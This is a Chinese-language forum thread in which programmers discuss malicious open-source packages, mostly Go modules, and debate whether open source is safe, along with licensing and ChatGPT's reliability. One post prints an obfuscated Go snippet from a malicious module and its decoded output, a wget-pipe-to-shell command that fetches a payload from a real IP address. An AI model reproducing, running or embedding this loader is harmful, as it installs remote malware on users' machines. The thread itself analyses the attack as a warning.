使用开源软件有重大隐患

DDD888

好奇怪，为何不加后门呢？一来就格式化硬盘，不是太容易暴露自己了吗？

https://socket.dev/blog/wget-to- ... destructive-payload
https://www.bleepingcomputer.com ... -modules-on-github/
https://www.youtube.com/watch?v=hE55JVTCwuI

我在想指望别人来纠错，是否等于拿自己当实验品？

limyae2009

楼主为什么这么喜欢开源？是自己做点小项目吗？


你给程序运行的权限不能太高，admin权限肯定不能给，网络是一个大杂烩 ：）

DDD888

我让chatgpt给输出下答案，顺便看看chatgpt到底有价值吗？

https://chatgpt.com/share/68240bc1-7f00-8009-a29b-71860126e353

显然连最基本的运算都不行

下面的程序是输入到https://go.dev/play/，我已经有七年没写GOLANG了，这是运行结果"wget -O - http://147.45.44.41/storage/de373d0df/ccd7b46d | /bin/sh &"

package main

import (
        "fmt"
)

func main() {
        DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
        PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]

        // Show the result.
        fmt.Printf("%#v\n", PWcf)
}

DDD888

limyae2009 发表于 2025-5-14 13:06
楼主为什么这么喜欢开源？是自己做点小项目吗？

没办法啦，现在rust language 下的crate都是开源的

limyae2009

DDD888 发表于 2025-5-14 13:23
没办法啦，现在rust language 下的crate都是开源的

哦，Rust没用过，它的运行权限是怎么样的？

像IIS那样还是Apache？

DDD888

limyae2009 发表于 2025-5-14 13:29
哦，Rust没用过，它的运行权限是怎么样的？

像IIS那样还是Apache？

用rust language 开发代码运行方式和用c语言一模一样，运行权限是使用者给的

limyae2009

DDD888 发表于 2025-5-14 13:32
用rust language 开发代码运行方式和用c语言一模一样，运行权限是使用者给的 ...

那要很当心了：）

DDD888

limyae2009 发表于 2025-5-14 13:34
那要很当心了：）

还好现在发生的是攻击GOLANG，我想我们程序员不应该自求多福，世界上坏料太多了

icyphish

我以前学编程，老师第一个教的就是 never trust other people's code. 这么多年下来 我确信这是上过最好的一堂课  :)

DDD888

icyphish 发表于 2025-5-14 14:04
我以前学编程，老师第一个教的就是 never trust other people's code. 这么多年下来 我确信这是上过最好的 ...

是的，太可怕了

https://kerkour.com/rust-crate-backdoor

scoopy

用别人的程序当然应该小心，但开源的好处之一就是源代码公开，这样基本无论什么代码，都会有这样那样的人去研究这些源代码，如果其中有猫腻，基本都会公开，所以应该反而比封闭系统里用的软件更安全。

dpblue

DDD888 发表于 2025-5-14 13:22
我让chatgpt给输出下答案，顺便看看chatgpt到底有价值吗？

https://chatgpt.com/share/68240bc1-7f00-8009 ...

chatgpt擅长的是写作和画画

你让一个艺术家回答“请根据DmM推导PWcf的值”，感觉没有用对工具啊

DDD888

dpblue 发表于 2025-5-14 16:58
chatgpt擅长的是写作和画画

你让一个艺术家回答“请根据DmM推导PWcf的值”，感觉没有用对工具啊 ...

但这艺术家也想当程序员

DDD888

scoopy 发表于 2025-5-14 15:37
用别人的程序当然应该小心，但开源的好处之一就是源代码公开，这样基本无论什么代码，都会有这样那样的人去 ...

根據此文，沒人會去檢查autotools生成的結果，也就是說源代碼公開對糾錯是無用的，即聾子的耳朵，擺設啦，絕大多數C 項目使用autotools，其實根本不需要使用autotools，我很慶幸我沒有用C語言寫代碼，當然啦，RUST LANGUAGE有MACRO風險

https://felipec.wordpress.com/20 ... autotools-insanity/

DDD888

DDD888 发表于 2025-5-14 20:18
但这艺术家也想当程序员

其實程序員的工作就應該給人來做啦，資本傢應該哪涼快待哪去

DDD888

scoopy 发表于 2025-5-14 15:37
用别人的程序当然应该小心，但开源的好处之一就是源代码公开，这样基本无论什么代码，都会有这样那样的人去 ...

問題是研究開源代碼的貓膩需要錢，例如雇傭程序員編寫SECURITY代碼，運行代碼的服務器也是要錢的，現在是資本主義社會，誰付這錢？開源軟件說的很清楚啦，是自由啦，不是免費啦

將後門代碼嵌入開源軟件的當然是由資金支持的，例如銀行的網站使用了開源軟件被植入後門，那黑客就可以自由盜用金錢

eguan88

DDD888 发表于 2025-5-14 13:22
我让chatgpt给输出下答案，顺便看看chatgpt到底有价值吗？

https://chatgpt.com/share/68240bc1-7f00-8009 ...

GPT有时候不灵的，你得去纠正

DDD888

eguan88 发表于 2025-5-15 11:00
GPT有时候不灵的，你得去纠正

儅人放棄思考的時候就是自作自受的時候

cathyqk

人类有从贝叶斯概率推断进化到规则推断的进化能力，LLM没有这个能力，它永远是停留在贝叶斯后验这个档次，不知道现象重复出现后这个场景应该直接了当的给出0或1了。

DDD888

DDD888 发表于 2025-5-15 11:42
儅人放棄思考的時候就是自作自受的時候

看了我自己寫的話，想起了超市裏廣告標簽，買一件商品1新西蘭元，買同樣的兩件商品捆綁銷售優惠，價格是2.4新西蘭元(我女兒曾問我，如果我買兩個同樣的商品是否必須付2.4新西蘭元，還是付2新西蘭元，我堅定的和她說我只付2新西蘭元 在這種問題上必須清晰果斷的回答 )，這兩個價格的同樣商品都是豐富供應，不存在缺貨 ，儅消費者不校驗超市的數字，閉著眼相信超市的話，？？？現在CHATGPT等工具大概就在謀求這個壟斷地位，讓人放棄思考，只相信CHATGPT的回答，並以此作爲法律

shayy

不仅如此，开源软件还要看license conditions
有些是要求你出售基于开源的产品时，你必须给你的客户提供你享受的同样的开源便利，至少基于开源那部分的源代码要开源, 思科就被告过
https://www.reddit.com/r/opensou ... licenses_litigated/

DDD888

shayy 发表于 2025-5-15 12:45
不仅如此，开源软件还要看license conditions
有些是要求你出售基于开源的产品时，你必须给你的客户提供你 ...

這個不需要

two-clause BSD license

例如蘋果，SONY使用FREEBSD CODE WITHOUT PUBLISH SOURCE CODE

MerryX

就爱看你天天拿免费的老黄历自我麻痹

DDD888

MerryX 发表于 2025-5-15 12:56
就爱看你天天拿免费的老黄历自我麻痹

很高興你在享受，那贊助點錢給窮苦的人吧

https://www.caritas.org.au/

交易人生

使用开源不能随便选，公司发布的好过个人，还要看是不是使用的人多，有没有定期的维护，如果商业用，要看licenses 而且必须要讨论和approve .

MerryX

实现AGI真的要来了吗？继AlphaGo在围棋上打败人类后，Google又要在数学和算法上打败人类了？

Google 刚刚发布了一个 AI Agent —— AlphaEvolve，它成功的找到了一种全新的算法，性能超过了过去Strassen 1969年发明的算法！

AlphaEvolve 是一个基于 Gemini 的增强 Agent，他在数学分析、几何、组合学和数值论中超过 50 个公开问题中，在约 75%的问题下，它重新发现了最先进的研究方案，以及在 20%的问题下，AlphaEvolve 改进了之前已知的最优解方案。

Google 还称它推动了伪数问题。这个几何挑战吸引了数学家们超过 300 年，它涉及到与一个公共单位采购相同切勿非重叠球的最大数量。AlphaEvolve 发现了一个由 593 个外采购成的配置，并在 11 维中确立了新界限。（当然我是数学学渣看不懂这在说什么）。

目前这个 AlphaEvolve 还在申请试用阶段。

路由心生

我只是很好奇楼主为什么一开始简体，后来变繁体。

dnr

因为忘了切换？

OldSoul

这是go的生态问题 去中心化的管理模式必然导致了这个问题

DDD888

MerryX 发表于 2025-5-15 18:08
实现AGI真的要来了吗？继AlphaGo在围棋上打败人类后，Google又要在数学和算法上打败人类了？

Google 刚刚 ...

deepseek, x, google gemini哪個不都是這樣說的？現在還有聲息嗎？